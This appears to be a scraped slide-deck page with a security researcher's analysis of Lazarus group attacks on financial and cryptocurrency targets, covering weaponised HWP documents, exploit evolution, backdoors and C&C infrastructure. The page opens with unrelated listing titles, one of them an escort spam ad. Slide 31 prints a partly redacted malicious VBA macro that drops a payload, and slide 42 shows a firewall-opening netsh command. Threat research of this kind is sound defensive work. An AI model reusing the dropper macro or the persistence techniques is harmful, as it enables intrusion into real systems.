ICT role in 21st century education and it's challenges.pdf
 
My Presentation "In Your Hands" by Halle Bailey
My Presentation "In Your Hands" by Halle BaileyMy Presentation "In Your Hands" by Halle Bailey
My Presentation "In Your Hands" by Halle Bailey
 
Call Girl Number in Khar Mumbai📲 9892124323 💞 Full Night Enjoy
Call Girl Number in Khar Mumbai📲 9892124323 💞 Full Night EnjoyCall Girl Number in Khar Mumbai📲 9892124323 💞 Full Night Enjoy
Call Girl Number in Khar Mumbai📲 9892124323 💞 Full Night Enjoy
 
Introduction to Prompt Engineering (Focusing on ChatGPT)
Introduction to Prompt Engineering (Focusing on ChatGPT)Introduction to Prompt Engineering (Focusing on ChatGPT)
Introduction to Prompt Engineering (Focusing on ChatGPT)
 
Mohammad_Alnahdi_Oral_Presentation_Assignment.pptx
Mohammad_Alnahdi_Oral_Presentation_Assignment.pptxMohammad_Alnahdi_Oral_Presentation_Assignment.pptx
Mohammad_Alnahdi_Oral_Presentation_Assignment.pptx
 

AREA41 - Anatomy of attacks aimed at financial sector by the Lazarus group

  • 1. Anatomy of attacks aimed at financial sector by the Lazarus group June 28, 2018 Seongsu Park Senior Security Researcher @ Kaspersky Lab GReAT
  • 2. Who is Lazarus? • Notorious APT group • State-sponsored APT group • Aimed at financial profit and cyber espionage, sabotage LAZARUS Andariel Bluenoroff …… …… Well-known attack case 2013 — DarkSeoul cyber attack 2014 — SPE cyber attack 2016 — Bangladesh bank heist 2017 — WannaCry outbreak
  • 4. About Manuscrypt • From when?  Start to use Manuscrypt from around 2013  Use it actively until recent • Connection?  Many overlap with known Lazarus code style and C&C infrastructure • Attack where?  Usually attacked national intelligence before  Recently, used when attacked financial sector
  • 6. Status of cryptocurrency exchange of Korea World TOP 10 Cryptocurrency Exchanges South Korea company
  • 9. Weaponized hwp HWP file format • Hangul (also known as Hangul Word Processor or HWP) is a proprietary word processing application published by the South Korean company Hancom Inc. -Wikipedia • Used by most government agencies and government offices due to national software activation policy of Government • The South Korea is one of the few countries where MS Word does not rank first Recently, postscript mainly used to deliver payload
  • 10. Decoy and targets Cryptocurrency Any cryptocurrency related news/contents Cryptocurrency market expectation Legal issues Related to lawsuit or audit Forms about legal issues Resume Resume of mainly financial related person Some decoy include victim company name
  • 11. Relationship Last saved user name Author name Malicious hwp
  • 12. Postscript Type #1 — Postscript has asciihex-format executable — Drop file %startup% folder for persistence mechanism — Dropped file is Manuscrypt Direct drop from embedded ascii hex string Creation path (+persistence mechanism) asciihex type payload Asciihex type Manuscrypt Postscript to drop executable Drop and execute Structure
  • 13. Postscript Type #2 — Use Chinese variable name i.e.) yaoshi, yima, yinzi — Decrypt real postscript/shellcode with hardcoded XOR key Has encryption stage with 4-bytes XOR key 4-bytes XOR key Encrypted postscript & Shellcode Postscript to decrypt Decrypt Structure Encrypted 32-bits Manuscrypt Encrypted 64-bits Manuscrypt Encrypted postscript and shellcode Encrypted Manuscrypt executable
  • 14. Postscript Type #2 – Decrypted data — Decrypted data contains exploit code and shellcode — Trigger the postscript vulnerability and execute shellcode Has encryption stage with 4-bytes XOR key Encrypted postscript & Shellcode Postscript to decrypt Exploit, Decrypt payload and inject Structure Encrypted 32-bits Manuscrypt Encrypted 64-bits Manuscrypt Shellcode to decrypt payload and inject Heap-spray Exploit code
  • 15. Postscript Type #3-4 — Remove decryption process — Malware author elaborate exploit code Elaborated exploit code Shellcode Postscript Exploit Structure Encrypted 32-bits Manuscrypt Encrypted 64-bits Manuscrypt Postscript Shellcode Encrypted Manuscrypt Decrypt & Inject
  • 16. Postscript type #5 – add XOR — Same structure with #3 — Add shellcode decryption script with 1-byte XOR Elaborated exploit code Script for decryption of shellcode Shellcode Postscript Decrypt & Exploit Structure Encrypted 32-bits Manuscrypt Encrypted 64-bits Manuscrypt Postscript Decrypt & Inject
  • 17. Postscript type #6 — Same postscript to trigger vulnerability — No more embedded payload — Shellcode just has download function Change shellcode function Shellcode Postscript Structure Postscript Decrypt & Exploit Download Manuscrypt
  • 18. Change history of hwp attack Type #2 • Start to use postscript vulnerability • Decrypt shellcode and exploitation postscript with 4-bytes XOR • Decrypt payload with 4-bytes XOR key Type #3 • Remove shellcode/postscript decryption routine • Elaborate postscript to trigger vulnerability • Decrypt payload with 4-bytes XOR key Type #4 • Decrypt payload with AES algorithm Type #5 • Add shellcode encryption postscript with 1-byte XOR Type #6 • Change shellcode just download payload Type #1 • Drop embedded asciihex type payload
  • 19. Change history of hwp attack Asciihex type Manuscrypt Postscript to drop executable Drop and execute Structure Encrypted postscript & Shellcode Postscript to decrypt Decrypt Structure Encrypted 32-bits Manuscrypt Encrypted 64-bits Manuscrypt Shellcode Postscript Exploit Structure Encrypted 32-bits Manuscrypt Encrypted 64-bits Manuscrypt Postscript Decrypt & Inject Shellcode Postscript Decrypt & Exploit Structure Encrypted 32-bits Manuscrypt Encrypted 64-bits Manuscrypt Postscript Decrypt & Inject Shellcode Postscript Structure Postscript Decrypt & Exploit Download Manuscrypt Type #1 Type #2 Type #3, 4 Type #5 Type #6 Decrypt & Inject
  • 20. Change history of hwp attack Type #1 Type #6Type #2 Type #5Type #4Type #3 4-bytes XOR Shellcode Decryption 1-bytes XOR 1-bytes XOR Shellcode Triggering CVE-2017-8291 (Ghostscript exploit) Shellcode Type Decrypt embedded payload and inject to legit process Download 4-bytes XOR AES Payload Decryption
  • 21. 21 Attacker vs Defender Type #1 Direct drop from asciihex string 2017-04 2017-06 2017-07 2017-08 2017-09 2017-10 2017-11 2017-12 2018-03 Type #2 Start to use Exploit XORed shellcode + exploit trigger script Type #4 Replace to AES algorithm Type #3 Polishing exploit script 4-bytes XOR decryption Type #6 Download payload from remote server Type #5 Decrypt shellcode with 1-byte XOR ATTACKER SIDE DEFENDER SIDE Detect embedded ascii type executable Detect XOR postscript routine Detect embedded shellcode in postscript Detect embedded encrypted payload
  • 22. Shellcode comparison from each types Different postscripts, but same shellcode
  • 23. Shellcode comparison from each types Different postscripts, but same shellcode Process searching Get handle
  • 24. Shellcode Shellcode execution flow Get API by hash Decrypt payload Find decryption key Get Handle Inject to legit process
  • 25. Payload summary IP-based C&C communication type • Only used up to type #2 • Not seen after November 2017 • Fake SSL communication • Full featured backdoor - File handling - Process handling - Execute commands - Data exfiltration HTTP-based C&C communication type • Usually used this type communications • Using compromised server • Full featured backdoor - System info gathering - Execute commands - and so on
  • 26. Type of C&C servers COMPROMISED SERVER — Compromised server — Direct connect by IP address — Encryption channel COMPROMISED WEB SERVER IN CHINA — Usually compromised IIS server — Upload attacker’s PHP scripts — DedeCMS vulnerability — Wordpress vulneraility COMPROMISED WEB SERVER IN KOREA — Usually compromised IIS server — Upload attacker’s JSP scripts — Using specific board vulnerability — Using wordpress vulnerability
  • 27. Not only hwp file
  • 28. Not only hwp file Persistence attack 2017-07-31 07:40:07 비트코인_지갑주소 _및_거래번호.hwp e3796387 (web) KR 2017-07-31 16:25:00 비트코인_지갑주소 _및_거래번호.doc e3796387 (web) KR 2017-08-03 18:13:23 비트코인 거래내역.xls e3796387 (web) KR Decoy of malicious hwp Decoy of malicious word
  • 30. Attack methodology SPEARPHISHING — Malicious office document — Malicious macro embedded — Decoy : Usually used job description and proposal
  • 31. Attack methodology Structure of Macro Attribute VB_Name = "Module1" Sub Auto_Open() On Error GoTo gaqz liveOn = "sjop/fyf" liveOff = Environ("temp") + "" For qnx = 1 To Len(liveOn) liveOff = liveOff + Chr(Asc(Mid$(liveOn, qnx, 1)) - 1) Next Dim str(1635) As String str(1) = "F0E72DBDBEBDBDBD………[redacted]……………DBDBDBD" .... [redacted]…. str(1635) = "9D9D9D9D9D9D81…. ……[redacted]…..….……DBDBDBD" Dim offBin(499) As Byte Open liveOff For Binary Access Write As #1 lpdq = 1 For jnx = 0 To 1634 For inx = 0 To 499 offBin(inx) = Val("&H" + Mid(str(jnx + 1), inx * 2 + 1, 2)) offBin(inx) = offBin(inx) Xor 189 Next inx Macro to create payload liveOn = "EFG492:2/ymt" liveOffd = Environ("temp") + "" For qnx = 1 To Len(liveOn) liveOffd = liveOffd + Chr(Asc(Mid$(liveOn, qnx, 1)) - 1) Next qnx Dim strd(239) As String strd(1) = "1906D8296878D328C9C9C9…[redacted]…..36363636363636" ...... [redacted]…… strd(239) = "C9C9C9C9C9C9C9C9C9C9…[redacted]…….D9C9C9C9C9C9C9" Dim offBind(499) As Byte Open liveOffd For Binary Access Write As #2 lpdq = 1 For jnx = 0 To 238 For inx = 0 To 499 offBind(inx) = Val("&H" + Mid(strd(jnx + 1), inx * 2 + 1, 2)) offBind(inx) = offBind(inx) Xor 201 Next inx Put #2, lpdq, offBind lpdq = lpdq + 500 Next jnx Close #2 Macro to create decoy document
  • 32. Who is target? Finance Engineering Crypto Currency
  • 33. Payload summary • File search, handling • Process handling • Collect system information • Directory / File listing …… Full-featured backdoor a.k.a Fallchill • IP-based C&C communication - Fake SSL communication (Polar SSL) - Used compromised server • HTTP-based C&C communication - Compromised ASP hosting IIS server - Allegedly used board/CMS vulnerability
  • 35. How did I start this investigation? Malicious hwp dropped Manuscrypt Found 1 C&C server in South Korea — Suspected compromised server Working closely with investigation agency — Investigate compromised server — Found one proxy module Expanding research with our telemetry — Yara magic! — Found additional module from compromised sever
  • 36. Manuscrypt C2 infrastructure Manuscrypt infected host Send information Multi-stage Proxy Servers Communication Final-stage C2 server
  • 38. Malwares/Tools from C&C server Sensing the production process, manipulating the production process Monitoring, supervisory control and automated control of the production process Backdoor Variants Threat actor uses many kind of backdoors - Active backdoor, Passive backdoor, HTTP backdoor, IIS backdoor Proxy Malware Main component of multi stage of proxy structure, forward incoming traffic to other host Information Harvester TCP connection harvester to steal inbound/outbound network connections Other Tools Loader to decrypt and execute encrypted payload, File wiper to wipe out specific file securely
  • 39. Proxy module Simply forward traffic from incoming host to next hop Firewall punching Add allowed port list using windows command Fake SSL communication Disguised as legit sites SSL handshaking Configuration Stores configuration at registry key Saved configuration as specific file Updating file with data from another hop Decrypt this file when read
  • 40. Proxy module – P2P proxy another infected host Listening named pipe ((.pipeAnonymousPipe) Connect to external named pipe (%spipeAnonymousPipe) Polar SSL Encryption Thread #1 : Receive data from global P2P and write it to listened named pipe Listening named pipe ((.pipeAnonymousPipe) Thread #2 : Read data from external named pipe and send it to global P2P server Global P2P C&C server (Passive backdoor module installed) P2P-based C&C infrastructures
  • 41. Active backdoor Has C&C server address, performs backdoor functions IP-based communications - Configuration data in registry key - Full-featured backdoor • File / directory listing • Process handling • Get system information • Execute windows command • Send screenshot HTTP-based communications - Same configuration data with IP-based backdoor - Choose HEAD, GET or POST method randomly when communicate C&C server - Full-featured backdoor
  • 42. Passive backdoor Doesn’t have C&C server address, Open port and wait connections Get Windows service list and choose one INSTALLATION PROCESS Get display name of service and append “Service” Append decrypted strings at service display name Change service name as small case and append “svc” Drop payload as service name Change file timestamp i.e. Choose “SharedAccess” service i.e. Change “Internet Connection Sharing (ICS)" display name to “Internet Connection Sharing Service” i.e. SharedAccess -> sharedaccesssvc i.e. Drop payload to sharedaccesssvc.dll i.e. Append “is an essential element in Windows System configuration and management.” F/W Punching cmd.exe /c netsh firewall add portopening TCP [Port] "adp" Backdoor functions - Almost same with active backdoor - Some variants has routing functions
  • 43. Other tools Log Wiper Generate random buffer Overwrite file with that data repeatly Delete file TCP Connection Harvester Choose proper API depends on OS version File name
  • 44. Malwares/Tools from C&C server Indonesia India Bangladesh Malaysia Vietnam Korea Taiwan Thailand Active Backdoor Passive Backdoor Proxy TCP conn Harvester IIS Backdoor HTTP Backdoor
  • 45. Malwares/Tools from C&C server India Active backdoor Columbia Dominican Republic GermanyIndonesia South Korea Sri Lanka Case #1 Panama Proxy HTTP Backdoor Passive Backdoor Vietnam TCP Conn Harvester Case #2
  • 46. Vulnerability information IP Web server ver OS fingerprinting 2xx.xx.xx.xxx N/A Windows Server 2003 R2 5x.xx.xx.xxx IIS 6.0 Aggressive OS guesses: Microsoft Windows Server 2003 (91%), Microsoft Windows Server 2003 SP2 (91%) 2xx.xx.xx.xxx IIS 6.0 N/A 1xx.xx.xx.xxx IIS 6.0 Aggressive OS guesses: Microsoft Windows 2003 R2 (93%), Microsoft Windows Server 2003 (93%), Microsoft Windows Server 2003 SP2 (93%) 2xx.xx.xx.xxx IIS 6.0 Aggressive OS guesses: Microsoft Windows XP SP3 or Windows Server 2003 SP2 (97%), Microsoft Windows Server 2003 SP2 (94%), 1xx.xx.xx.xxx IIS 6.0 Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (99%), Microsoft Windows XP SP3 or Windows Server 2003 SP2 (97%), Microsoft Windows Server 2003 SP2 (94%), 2xx.xx.xx.xxx IIS 6.0 N/A 2xx.xx.xx.xxx IIS 6.0 Aggressive OS guesses: Microsoft Windows Server 2003 SP2 (89%) 5x.xx.xx.xxx N/A Aggressive OS guesses: Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows Server 2003 SP1 - SP2 (92%)
  • 47. Vulnerability information 2017-03-26 CVE-2017-7269 published 2017-04-11 Attack tool for this exploit was created 2017-03-31 PoC for CVE-2017-7269 added to Metasploit module 2017-06-13 Microsoft published patch for this vulnerability
  • 48. Let’s put them together Active backdoor Passive backdoor Proxy module TCP harvester ……Victim (Manuscrypt infected) Weaponized hwp/doc Corporate Users Sometimes infect corporate hosts from server C&C server Infrastructure Configure C&C infra Control infected hosts Communicate multi-stage C&C
  • 49. Takeaways • Never let your server compromised by them • They keep polishing their tools • Their favorite attack vector is spearphishing • Recently, they are changing their TTPs • Let’s head up their TTPs
  • 50. LET’S TALK? Twitter : @unpacker Mail : seongsup4rk@gmail.com